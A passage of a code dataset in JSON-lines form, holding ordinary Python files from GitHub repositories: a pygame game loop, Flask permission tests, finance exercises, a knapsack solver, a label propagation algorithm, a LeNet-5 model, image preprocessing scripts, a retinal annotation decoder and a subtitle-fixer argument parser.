self.paused:\n\t\t\t\t\t\tif show_regles:\n\t\t\t\t\t\t\tshow_regles=False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\t\t\t\tres_m = self.ig_menu.getSelected()\n\t\t\t\t\t\t\t\tif res_m == 0:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.unpause()\n\t\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\telif res_m == 1:\n\t\t\t\t\t\t\t\t\tshow_regles=True\n\t\t\t\t\t\t\t\telif res_m == 2:\n\t\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\t\tprint('Ending game ...')\n\t\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\t\telif event.key == pygame.K_ESCAPE:\n\t\t\t\t\t\t\t\tself.paused=False\n\t\t\t\t\t\t\t\tpygame.mixer.music.unpause()\n\t\t\t\t\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\t\t\t\t\tself.ig_menu.selectPrev()\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.ig_menu.switchSelected()\n\t\t\t\t\telif show_gameOver:\n\t\t\t\t\t\tprint('Ending game ...')\n\t\t\t\t\t\tself.game_over.stop()\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse:\n\t # Handle KEYDOWN\n\t\t\t\t\t\tif event.unicode == 'd':\n\t\t\t\t\t\t\tself.hud.selectNext()\n\t\t\t\t\t\telif event.unicode == 'q': # Q sur un Azerty\n\t\t\t\t\t\t\tself.hud.selectPrev()\n\t\t\t\t\t\telif event.unicode == 'a': # A sur un Azerty\n\t\t\t\t\t\t\tself.hud.switchMode()\n\t\t\t\t\t\telif event.unicode == '-':\n\t\t\t\t\t\t\tprint('- HEY !')\n\t\t\t\t\t\telif event.unicode == '.':\n\t\t\t\t\t\t\tself.joueurIA.setVieChateau(0)\n\t\t\t\t\t\telif event.key == pygame.K_ESCAPE:\n\t\t\t\t\t\t\tself.paused = True\n\t\t\t\t\t\t\tpygame.mixer.music.pause()\n\t\t\t\t\t\telif event.key == pygame.K_UP:\n\t\t\t\t\t\t\tself.grille.selectUp()\n\t\t\t\t\t\telif event.key == pygame.K_DOWN:\n\t\t\t\t\t\t\tself.grille.selectDown()\n\t\t\t\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\t\t\t\tself.grille.selectLeft()\n\t\t\t\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\t\t\t\tself.grille.selectRight()\n\t\t\t\t\t\telif event.key == pygame.K_RETURN:\n\t\t\t\t\t\t\tif self.hud.canUse():\n\t\t\t\t\t\t\t\tif self.hud.getMode()=='towers':\n\t\t\t\t\t\t\t\t\tif self.grille.canBuild(self.grille.getSelected(),self.joueur.getEquipe()):\n\t\t\t\t\t\t\t\t\t\ttour = self.joueur.createBuild(self.hud.getSelected(),self.grille,self.grille.getSelected())\n\t\t\t\t\t\t\t\t\t\tif tour == False:\n\t\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Argent insufisant ...\",70)\n\t\t\t\t\t\t\t\t\t\t\tprint('Argent insufisant')\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tself.grille.place(tour)\n\t\t\t\t\t\t\t\t\t\t\tself.hud.use()\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Placement impossible !\",70)\n\t\t\t\t\t\t\t\t\t\tprint('Placement impossible')\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tif self.grille.canSpawn(self.grille.getRoute(),self.joueur.getEquipe()):\n\t\t\t\t\t\t\t\t\t\tunit = self.joueur.createUnit(self.hud.getSelected(),self.grille,self.grille.getRoute())\n\t\t\t\t\t\t\t\t\t\tif unit == False:\n\t\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Argent insufisant ...\",70)\n\t\t\t\t\t\t\t\t\t\t\tprint('Argent insufisant')\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tself.grille.place(unit)\n\t\t\t\t\t\t\t\t\t\t\tself.hud.use()\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself.hud.showMessage(\"Placement impossible !\",70)\n\t\t\t\t\t\t\t\t\t\tprint('Placement impossible')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.hud.showMessage(\"Cooldown en cours.\",70)\n\t\t\t\t\t\t\t\tprint('Cooldown en cours')\n\t\t\t\t\"\"\"\n\t\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\t\tkeys_pressed.pop(event.key) # Create KEYPRESS events\n\t\t\t\t\tif len(keys_pressed)<=0:\n\t\t\t\t\t\tpygame.time.set_timer(pygame.USEREVENT,0) # Remove timer\n\t\t\t\telif event.type == pygame.USEREVENT:\n\t\t\t\t\tfor key,item in keys_pressed.iteritems():\n\t\t\t\t\t\tif key == pygame.K_UP:\n\t\t\t\t\t\t\tself.grille.selectUp()\n\t\t\t\t\t\telif key == pygame.K_DOWN:\n\t\t\t\t\t\t\tself.grille.selectDown()\n\t\t\t\t\t\telif key == pygame.K_LEFT:\n\t\t\t\t\t\t\tself.grille.selectLeft()\n\t\t\t\t\t\telif key == pygame.K_RIGHT:\n\t\t\t\t\t\t\tself.grille.selectRight()\n\t\t\t\t\"\"\"\n\t\t\t# --- Game logic should go here\n\t\t\t#pygame.display.update()\n\t\t\tself.screen.fill((75,75,75))\n\t\t\tif self.paused:\n\t\t\t\tif show_regles:\n\t\t\t\t\tself.rules.draw()\n\t\t\t\telse:\n\t\t\t\t\tself.ig_menu.draw()\n\t\t\telif show_gameOver:\n\t\t\t\tself.game_over.draw()\n\t\t\telse:\n\t\t\t\tself.grille.draw()\n\t\t\t\tself.hud.draw()\n\t\t\t\tif turn%300==0:\n\t\t\t\t\tself.joueur.recevoirArgent(100)\n\t\t\t\t\tself.joueurIA.recevoirArgent(100)\n\t\t\t\tif turn%5==0:\n\t\t\t\t\tself.IA.play()\n\t\t\t\tif turn%10==0:\n\t\t\t\t\tself.grille.play()\n\t\t\t# --- Check if the game is over\n\t\t\tif self.joueur.getVieChateau()==0 and not show_gameOver:\n\t\t\t\tshow_gameOver = True\n\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\tself.game_over.start(False)\n\t\t\telif self.joueurIA.getVieChateau()==0 and not show_gameOver:\n\t\t\t\tshow_gameOver = True\n\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\tself.game_over.start(True)\n\n\t\t\t# --- Go ahead and update the screen with what we've drawn.\n\t\t\tpygame.display.flip()\n\n\t\t\t# --- Limit to 60 frames per second\n\t\t\tself.clock.tick(60)\n\n\t\t# Close the window and quit.\n\n\t\tprint('Ending game ...')\n\n\t\treturn True\n","repo_name":"Ivan-Roger/RoadToMordor","sub_path":"game_classe.py","file_name":"game_classe.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8503637269","text":"# coding=utf-8\nfrom flask.ext.testing import TestCase\nfrom nose.tools import assert_equal\n\nfrom aireadManager.main import app\nfrom aireadManager.model import db\nfrom aireadManager.model.group_permission import GroupPermissionModel\nfrom aireadManager.test.init_te_st_db import TestDBConfig\nfrom aireadManager.utils.errors import Code\nfrom aireadManager.utils.permissions import Roles\nfrom aireadManager.utils.principal import role_set\n\n\n__author__ = 'airead'\n\nSuccessRet = {\n 'code': Code.SUCCESS\n}\n\nGroupPerm1 = {\n 'group_id': 1,\n 'permission_id': 2\n}\n\nGroupPerm2 = {\n 'group_id': 2,\n 'permission_id': 1\n}\n\n\nclass Test_GroupPermissions(TestCase):\n def create_app(self):\n app.config.from_object(TestDBConfig)\n return app\n\n def setUp(self):\n db.drop_all()\n db.create_all()\n group1 = GroupPermissionModel(**GroupPerm1)\n group2 = GroupPermissionModel(**GroupPerm2)\n db.session.add(group1)\n db.session.add(group2)\n db.session.commit()\n\n def tearDown(self):\n db.session.remove()\n\n def test_groups_get(self):\n rv = self.client.get('/group_permissions/')\n group1, group2 = rv.json\n assert_equal(group1['permission_id'], GroupPerm1['permission_id'])\n assert_equal(group1['group_id'], GroupPerm1['group_id'])\n assert_equal(group2['permission_id'], GroupPerm2['permission_id'])\n assert_equal(group2['group_id'], GroupPerm2['group_id'])\n\n def test_groups_post(self):\n data = {\n 'group_id': 2,\n 'permission_id': 2\n }\n\n rv = self.client.post('group_permissions/', data=data)\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/', data=data)\n assert_equal(rv.json['uri'], '/group_permissions/3')\n\n groups = db.session.query(GroupPermissionModel).all()\n assert_equal(len(groups), 3)\n\n def test_group_put(self):\n data = {\n 'permission_id': 1\n }\n rv = self.client.post('group_permissions/1?at=put', data=data)\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/1?at=put', data=data)\n assert_equal(rv.json, SuccessRet)\n\n group = db.session.query(GroupPermissionModel).filter_by(id=1).one()\n assert_equal(group.permission_id, 1)\n\n def test_group_delete(self):\n rv = self.client.post('group_permissions/1?at=delete')\n self.assert403(rv)\n\n with role_set(Roles.admin):\n rv = self.client.post('group_permissions/1?at=delete')\n assert_equal(rv.json, SuccessRet)\n\n groups = db.session.query(GroupPermissionModel).all()\n assert_equal(len(groups), 1)\n group = groups[0]\n assert_equal(group.permission_id, GroupPerm2['permission_id'])\n\n def test_group_get(self):\n rv = self.client.get('/group_permissions/1')\n assert_equal(rv.json['permission_id'], GroupPerm1['permission_id'])\n assert_equal(rv.json['group_id'], GroupPerm1['group_id'])\n","repo_name":"Airead/airead-manager","sub_path":"aireadManager/test/test_group_permissions.py","file_name":"test_group_permissions.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25394943601","text":"#ex_cap5_pag90\n#ex5.11 Escreva um programa que pergunte o deósito inicial e a taxa de juros de uma poupança. Exiba os valores mês a mês para o s24 primeiros meses. Escreva o total danho com kuros período.\ndeposito = float(input(\"Depósito inicial: \"))\njuros = float(input(\"taxa de juros: \"))\nmes = 1\nsaldo = deposito\n\nwhile mes <= 24:\n saldo = saldo + (saldo * (juros/100))\n print(f\"Saldo do mês {mes} é de R${saldo:5.2f}.\")\n mes = mes + 1\nprint(f\"ao final de tods os meses, o juros em conta é de R${saldo-deposito:5.2f}.\")\n\n\n\n#ex5.12 Altere o programa anterior de forma a perguntar tambem o valor depositado mensalmente. Esse valor sera depositado no inicio de cada mes, e você deve considera-lo para calculo de juros do mes seguinte.\n\ndeposito = float(input(\"Depósito inicial: \"))\njuros = float(input(\"taxa de juros: \"))\ndeposito_mensal = float(input(\"Depósito mensal: \"))\nmes = 1\nsaldo = deposito\n\nwhile mes <= 24:\n saldo = saldo + (saldo * (juros/100)) + deposito_mensal\n print(f\"Saldo do mês {mes} é de R${saldo:5.2f}.\")\n mes = mes + 1\nprint(f\"ao final de tods os meses, o juros em conta é de R${saldo-deposito:5.2f}.\")\n\n#ex5.13 Escreva um programa que pergunte o valor inicial de uma dívida e o juros mensal. Pergunte também o valor mensal que será pago. Imprima o número de meses para que dívida seja paga,o total pago e o total de juros pago.\ndivida = float(input(\"valor inicial da dívida: \"))\ntaxa = float(input(\"taxa de juros mensal: \"))\npagto_mensal = float(input(\"pagamento mensal no valor de R$: \"))\nmes = 1\nif (divida * (taxa/100) > pagto_mensal):\n print(\"Escolha outra valor de pagamento, pois os juros são superiores ao pagamento mensal.\")\n\nelse:\n saldo = divida\n juros_pago = 0\n while saldo > pagto_mensal:\n juros = saldo * taxa / 100\n saldo = saldo + juros - pagto_mensal\n juros_pago = juros_pago + juros\n print(f\"Saldo da dívida no mês {mes} é de R${saldo:6.2f}.\")\n mes = mes + 1\n print(f\"Para pagar uma dívida de R${divida:8.2f}, a {taxa:5.2f} % de juros,\")\n print(f\"você precisará de {mes - 1} meses, pagando um total de R${juros_pago:8.2f} de juros.\")\n print(f\"No último mês, você teria um saldo residual de R${saldo:8.2f} a pagar.\")\n","repo_name":"GaybsGimenez/python_exercises","sub_path":"cap5/ex_cap5_pag90.py","file_name":"ex_cap5_pag90.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11908128173","text":"from typing import List\n\ndef knapsack(weights: List[int], values: List[int], max_weight: int) -> int:\n n = len(weights)\n dp = [[0] * (max_weight + 1) for _ in range(n + 1)]\n\n for i in range(max_weight + 1):\n dp[0][i] = 0\n\n for i in range(1, n + 1):\n for j in range(max_weight + 1):\n dp[i][j] = max(dp[i][j], (dp[i - 1][j - weights[i - 1]] + values[i - 1]) if j >= weights[i - 1] else 0, dp[i - 1][j]) \n\n return dp[n][max_weight]\n\nif __name__ == '__main__':\n weights = [int(x) for x in input().split()]\n values = [int(x) for x in input().split()]\n max_weight = int(input())\n res = knapsack(weights, values, max_weight)\n print(res)\n\n","repo_name":"yashanand1910/solutions","sub_path":"algomonster/dynamic-programming/0_1_knapsack_problem.py","file_name":"0_1_knapsack_problem.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21897464871","text":"import signed_utils as utils\nimport random as rd\nimport collections\n\n\nclass LabelPropagation:\n\n def __init__(self, dataset: utils.Dataset, neighborhood):\n \"\"\"\n 标签传播算法\n\n :param dataset: 数据集\n :param neighborhood: 邻域结构\n \"\"\"\n self._dataset = dataset\n self.neighborhood = neighborhood\n\n def label_propagation(self, max_iter=5, print_info=False):\n \"\"\"\n 基于标签传播的初始解生成方式。\n\n :param print_info: 输出信息开关\n :param max_iter: 最大迭代次数\n :return: solution: dict, partition: dict(community: set())\n \"\"\"\n\n solution, __ = utils.standard_initialize(self._dataset.vnum)\n changed = True\n ct = 0\n\n random_v = list(range(self._dataset.vnum))\n rd.shuffle(random_v)\n\n while changed and ct < max_iter:\n ct += 1\n changed = False\n\n for node in random_v:\n\n mcc = self.__most_common_community_label(node, current_solution=solution, node_neighborhood=self.neighborhood[node])\n if changed is False and mcc != solution[node]:\n changed = True\n solution[node] = mcc\n\n # reform the solution and partition\n partition = utils.solution2partition(solution)\n partition = utils.reform_partition(partition)\n solution = utils.partition2solution(partition, self._dataset.vnum)\n\n if print_info:\n print('Solution:', solution)\n print('Partition:', partition)\n print('Number of clusters:', len(partition))\n\n return solution, partition\n\n @staticmethod\n def __most_common_community_label(node, current_solution, node_neighborhood):\n \"\"\"\n 找到最公共的社区标签\n\n :param node: 节点序号\n :return: 正邻居为其社区+1,负邻居为其社区-1.由此得到的最大值\n \"\"\"\n pos_nbr, neg_nbr = node_neighborhood['+'], node_neighborhood['-']\n\n label_num = collections.defaultdict(int)\n\n for elem in pos_nbr:\n label_num[current_solution[elem]] += 1\n for elem in neg_nbr:\n label_num[current_solution[elem]] -= 1\n\n if label_num:\n return max(label_num, key=label_num.get)\n else:\n return current_solution[node]","repo_name":"Mcdhcnhk0o0/structural_balance","sub_path":"label_propagation_algorithm.py","file_name":"label_propagation_algorithm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"448421512","text":"# Lab 4 task 10\n\nimport numpy as np\n\ntry:\n data = np.genfromtxt('bikeSharing.csv', dtype=float, delimiter=',')\n\n new_data = np.delete(data, 0, axis=1)\n\n np.savetxt(\"minusFirstColumnBike.csv\", new_data, delimiter=',', fmt='%.2f')\n\n\nexcept IOError:\n print(\"Couldn't find the file\")\n","repo_name":"TomaszNowakDev/Programming_for_data_analytics","sub_path":"lab4/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69847681445","text":"from PIL import Image\n\n# Leitura da imagem\nimg = Image.open('Images/imagem.jpg')\n\n# Separação dos canais RGB\nr, g, b = img.split()\n\n# Exibição de cada canal separadamente\nr.show()\ng.show()\nb.show()","repo_name":"FelipeFerreiraDev/Computer-Graphics","sub_path":"Tratamentos básicos/separação_de_canais.py","file_name":"separação_de_canais.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6130118640","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Lenet5(nn.Module):\n def __init__(self):\n super(Lenet5, self).__init__()\n # 卷积层\n self.conv_unit = nn.Sequential(\n # x[batch_size,3,32,32]=>[batch_size,6,]\n # 卷积\n nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=0),\n # 池化\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0)\n )\n\n # flatten\n # 全连接层\n self.fc_unit = nn.Sequential(\n nn.Linear(16 * 5 * 5, 120),\n nn.ReLU(),\n nn.Linear(120, 84),\n nn.ReLU(),\n nn.Linear(84, 10)\n )\n\n def forward(self, x):\n batch_size = x.size(0)\n # x[b,3,32,32]==>[b,16,5,5]\n # 先卷积\n x = self.conv_unit(x)\n # 拉平\n x = x.view(batch_size, 16 * 5 * 5)\n # 全连接\n logits = self.fc_unit(x)\n\n return logits\n\n\n","repo_name":"iamjustarookie/DeepLearning","sub_path":"lenet5/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21937857735","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'\n\nimport os\nimport sys\nimport shutil\n\nfrom classes.Utils import *\nfrom classes.model.Config import *\n\nargv = sys.argv[1:]\n\nif len(argv) < 2:\n print(\"Error: not enough argument supplied:\")\n print(\"convert_imgs_to_arrays.py \")\n exit(0)\nelse:\n input_path = argv[0]\n output_path = argv[1]\n\nif not os.path.exists(output_path):\n os.makedirs(output_path)\n\nprint(\"Converting images to numpy arrays...\")\n\nfor f in os.listdir(input_path):\n if f.find(\".png\") != -1:\n img = Utils.get_preprocessed_img(\"{}/{}\".format(input_path, f), IMAGE_SIZE)\n file_name = f[:f.find(\".png\")]\n\n np.savez_compressed(\"{}/{}\".format(output_path, file_name), features=img)\n retrieve = np.load(\"{}/{}.npz\".format(output_path, file_name))[\"features\"]\n\n assert np.array_equal(img, retrieve)\n\n shutil.copyfile(\"{}/{}.gui\".format(input_path, file_name), \"{}/{}.gui\".format(output_path, file_name))\n\nprint(\"Numpy arrays saved in {}\".format(output_path))\n","repo_name":"tonybeltramelli/pix2code","sub_path":"model/convert_imgs_to_arrays.py","file_name":"convert_imgs_to_arrays.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":11790,"dataset":"github-code","pt":"52"} +{"seq_id":"72478051364","text":"# This script is meant to extend the odir annotations file's diagnostic code\n# fields. The file contains separate keyword annotation for each\n# side, but the code is given for both eyes together so we don't\n# know if i.e 'g=1' refers to the left or right.\n# I scanned the file semi manually and read the help file in order\n# to decypher the annotation code. In addition to the encoded\n# diagnostic keywords, there are exceptions of keywords that\n# indicate the image itself is either not a retina but a whole eye\n# image ('anterior' something...) or that there are two images of\n# the same side (the wrong side has 'no fundus' keyword). This\n# script encodes these special cases, for each eye separately,\n# in their own binary fields.\n# The output is a csv file and is printed to stdout for easy piping,\n# unless the --output argument is used.\n### Find All Diagnostic Keywords and Encode Them with:\n# N,D,G,C,A,H,M,O\n# N: normal\n# D: ((non) proliferative) nonproliferative retinopathy\n# G: glaucoma\n# C: catarct\n# A: age related macular degeneration\n# H: hypertensive retinopathy\n# M: myopia\n# O: other diagnosys except 'anterior segment image' and 'no fonndus image'\n# special keywords: 'anterior segment image', 'no fonndus image'\n\n\nfrom __future__ import print_function, division\nimport os\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport argparse\nimport sys\n\n\n# Command: python3 Preprocessing/decode_diagnostics_keywords.py /home/henrik/PycharmProjects/Project\\ A\\ -\\ VAE\\\n# Retina/odir/ODIR-5K_Training_Annotations\\(Updated\\)_V2.xlsx --out /home/henrik/PycharmProjects/Project\\ A\\ -\\ VAE\\\n# Retina/odir/decoded.csv\n\ninfo_text = \"\"\"Reads the odir\nannotation file and asigns diagnostic codes for each side according\nto the diagnostic keywords. So in addition to field 'N', 'D' etc.\nThe script adds fields 'LN','LD','RN','RD' etc.\nIn additional there is a field 'L-ant', 'R-ant' where a non-zero\nindicates there is the special 'anterio segment image' keyword,\nand 'L-no', 'R-no' which indicates the keyword 'no fundus image'.\nDiagnostic keyword code:\nN: normal\nD: ((non) proliferative) nonproliferative retinopathy\nG: glaucoma\nC: catarct\nA: age related macular degeneration\nH: hypertensive retinopathy\nM: myopia\nO: other diagnosys except 'anterior segment image' and 'no fonndus image'\nspecial keywords: 'anterior segment image', 'no fonndus image'\n\"\"\"\n\ndef decode_d_k(xsl_file, output_file=\"odir/odir_train_lr_annotations.csv\"):\n #xsl_file = path + \"ODIR-5K_Training_Annotations(Updated)_V2.xlsx\"\n df = pd.read_excel(xsl_file)\n\n # get all the unique diagnostics as a list\n l = df[\"Left-Diagnostic Keywords\"].tolist()\n l = np.unique(l).tolist()\n l = \",\".join(l)\n l = l.split(\",\")\n l = np.unique(l).tolist()\n s = \",\".join(l)\n s.replace(\",\", \"\")\n np.unique(l)\n s.split(\",\")\n x = l[-1]\n c = x[12] # some weird char that looks like ', '\n s = s.replace(c, \",\")\n l = s.split(\",\")\n l = np.unique(l).tolist() # now l realy contains the unique\n\n # add separate left and right diagnotics columns instead of the\n # joined one:\n df[\"LN\"] = np.zeros_like(df[\"N\"])\n df[\"LD\"] = np.zeros_like(df[\"D\"])\n df[\"LG\"] = np.zeros_like(df[\"G\"])\n df[\"LC\"] = np.zeros_like(df[\"C\"])\n df[\"LA\"] = np.zeros_like(df[\"A\"])\n df[\"LH\"] = np.zeros_like(df[\"H\"])\n df[\"LM\"] = np.zeros_like(df[\"M\"])\n df[\"LO\"] = np.zeros_like(df[\"O\"])\n df[\"RN\"] = np.zeros_like(df[\"N\"])\n df[\"RD\"] = np.zeros_like(df[\"D\"])\n df[\"RG\"] = np.zeros_like(df[\"G\"])\n df[\"RC\"] = np.zeros_like(df[\"C\"])\n df[\"RA\"] = np.zeros_like(df[\"A\"])\n df[\"RH\"] = np.zeros_like(df[\"H\"])\n df[\"RM\"] = np.zeros_like(df[\"M\"])\n df[\"RO\"] = np.zeros_like(df[\"O\"])\n df[\"L-ant\"] = np.zeros_like(df[\"O\"])\n df[\"L-no\"] = np.zeros_like(df[\"O\"])\n df[\"R-ant\"] = np.zeros_like(df[\"O\"])\n df[\"R-no\"] = np.zeros_like(df[\"O\"])\n\n ### Find All Diagnostic Keywords and Encode Them with:\n feature = {\n \"N\": \"normal fundus\",\n \"D\": \"proliferative retinopathy\",\n \"G\": \"glaucoma\",\n \"C\": \"catarct\",\n \"A\": \"age related macular degeneration\",\n \"H\": \"hypertensive retinopathy\",\n \"M\": \"myopia\",\n \"ant\": \"anterior segment\",\n \"no\": \"no fundus image\",\n }\n\n # a function to search pattern in text\n f = lambda pattern: lambda text: (pattern in text)\n\n np.vectorize(f(\"normal\"))(df[\"Left-Diagnostic Keywords\"])\n\n # find features (except 'O') in Left, then Right Eye:\n for key, val in feature.items():\n testl = np.vectorize(f(val))(df[\"Left-Diagnostic Keywords\"])\n testr = np.vectorize(f(val))(df[\"Right-Diagnostic Keywords\"])\n if key == \"no\":\n df.loc[testl, \"L-no\"] = 1 # special case 'no fundus'\n df.loc[testr, \"R-no\"] = 1 # special case 'no fundus'\n elif key == \"ant\":\n df.loc[testl, \"L-ant\"] = 1 # special case 'ant'\n df.loc[testr, \"R-ant\"] = 1 # special case 'no fundus'\n else:\n df.loc[testl, \"L\" + key] = 1\n df.loc[testr, \"R\" + key] = 1\n\n # remove feature keywors off the list of diagnostics\n # so only 'O' Diagnostics remain:\n olist = l.copy()\n for w in l:\n for key, val in feature.items():\n if val in w:\n olist.remove(w)\n\n olist.remove(\"lens dust\")\n olist.remove(\"optic disk photographically invisible\")\n olist.remove(\"low image quality\")\n olist.remove(\"image offset\")\n\n # Now find the 'O' (=all other) diagnostics:\n for val in olist:\n testl = np.vectorize(f(val))(df[\"Left-Diagnostic Keywords\"])\n testr = np.vectorize(f(val))(df[\"Right-Diagnostic Keywords\"])\n df.loc[testl, \"LO\"] = 1\n df.loc[testr, \"RO\"] = 1\n\n # Making Left and Right each apear in separate row\n cols = df.columns.tolist()\n newcols = [\n \"ID\",\n \"Side\",\n \"Patient Age\",\n \"Patient Sex\",\n \"Fundus Image\",\n \"Diagnostic Keywords\",\n \"N\",\n \"D\",\n \"G\",\n \"C\",\n \"A\",\n \"H\",\n \"M\",\n \"O\",\n \"anterior\",\n \"no fundus\",\n ]\n\n left_df = pd.DataFrame(columns=[\"ID\"])\n left_df[\"ID\"] = df[\"ID\"]\n left_df[\"Side\"] = \"L\"\n left_df[newcols[2:5]] = df[cols[1:4]]\n left_df[\"Diagnostic Keywords\"] = df[\"Left-Diagnostic Keywords\"]\n left_df[newcols[6:-2]] = df[cols[15:23]]\n left_df[newcols[-2:]] = df[[\"L-ant\", \"L-no\"]]\n\n right_df = pd.DataFrame(columns=[\"ID\"])\n right_df[\"ID\"] = df[\"ID\"]\n right_df[\"Side\"] = \"R\"\n right_df[newcols[2:5]] = df[[cols[i] for i in [1, 2, 4]]]\n right_df[\"Diagnostic Keywords\"] = df[\"Right-Diagnostic Keywords\"]\n right_df[newcols[6:-2]] = df[cols[23:-4]]\n right_df[newcols[-2:]] = df[[\"R-ant\", \"R-no\"]]\n\n new_df = pd.concat([left_df, right_df], axis=0)\n new_df = new_df.sort_values(by=[\"ID\", \"Side\"])\n dirname = os.path.dirname(output_file)\n os.makedirs(dirname, exist_ok=True)\n new_df.to_csv(output_file, sep=\"\\t\", index=False, header=True)\n\nif __name__ == \"__main__\":\n xsl_file = sys.argv[1]\n output_file = sys.argv[2]\n decode_d_k(xsl_file=xsl_file, output_file=output_file)\n\n","repo_name":"greggyfromtheblock/vae_for_retinal_images","sub_path":"utils/preprocess_annotations.py","file_name":"preprocess_annotations.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"30270907625","text":"import sys\nimport os\n\nfrom argparse import ArgumentParser\nfrom argparse import RawDescriptionHelpFormatter\n\n__all__ = []\n__version__ = 0.1\n__date__ = '2015-05-24'\n__updated__ = '2015-05-24'\n\nDEBUG = 1\nTESTRUN = 0\nPROFILE = 0\n\nclass fixParams:\n def __init__(self, f=None, d=None,s=None,e=None,m=None,o=None):\n self.fname=f\n self.direction=d\n self.startDiff=s\n self.endDiff=e\n self.movieLen=m\n self.outfname=o\n\nclass CLIError(Exception):\n '''Generic exception to raise and log different fatal errors.'''\n def __init__(self, msg):\n super(CLIError).__init__(type(self))\n self.msg = \"E: %s\" % msg\n def __str__(self):\n return self.msg\n def __unicode__(self):\n return self.msg\n\ndef getParams(argv):\n '''Command line options.'''\n\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv)\n\n\n #program_version = \"v%s\" % __version__\n #program_build_date = str(__updated__)\n #program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)\n program_shortdesc = 'srtFix' #__import__('__main__').__doc__.split(\"\\n\")[1]\n program_license = '''%s\n\n Created by user_name on %s.\n Copyright 2015 organization_name. All rights reserved.\n\n Licensed under the Apache License 2.0\n http://www.apache.org/licenses/LICENSE-2.0\n\n Distributed on an \"AS IS\" basis without warranties\n or conditions of any kind, either express or implied.\n\nUSAGE\n''' % (program_shortdesc, str(__date__))\n\n # Setup argument parser\n parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)\n #parser.add_argument(\"-r\", \"--recursive\", dest=\"recurse\", action=\"store_true\", help=\"recurse into subfolders [default: %(default)s]\")\n #parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action=\"count\", help=\"set verbosity level [default: %(default)s]\")\n #parser.add_argument(\"-i\", \"--include\", dest=\"include\", help=\"only include paths matching this regex pattern. Note: exclude is given preference over include. [default: %(default)s]\", metavar=\"RE\" )\n #parser.add_argument(\"-e\", \"--exclude\", dest=\"exclude\", help=\"exclude paths matching this regex pattern. [default: %(default)s]\", metavar=\"RE\" )\n #parser.add_argument('-V', '--version', action='version', version=program_version_message)\n #parser.add_argument(dest=\"paths\", help=\"paths to folder(s) with source file(s) [default: %(default)s]\", metavar=\"path\", nargs='+')\n parser.add_argument('direction', choices=['movie-before','movie-after'])\n parser.add_argument('-startDiff', type=float, required=True, \n help='difference at start of movie in seconds, e.g. 2.4')\n parser.add_argument('-endDiff', type=float, \n help='difference at END of movie in seconds, e.g. 2.4.')\n parser.add_argument('fileName')\n\n # Process arguments\n args = parser.parse_args()\n # checking the arguments\n if not os.path.exists(args.fileName):\n print('%(file)s: file does not exist' % {'file':args.fileName})\n args=None\n res = fixParams()\n res.direction = args.direction\n res.endDiff = args.endDiff\n res.startDiff = args.startDiff\n res.fname = args.fileName\n res.outfname = args.fileName[:-4]+'.fixed'+args.fileName[-4:]\n return res\n\n\nif __name__ == \"__main__\":\n 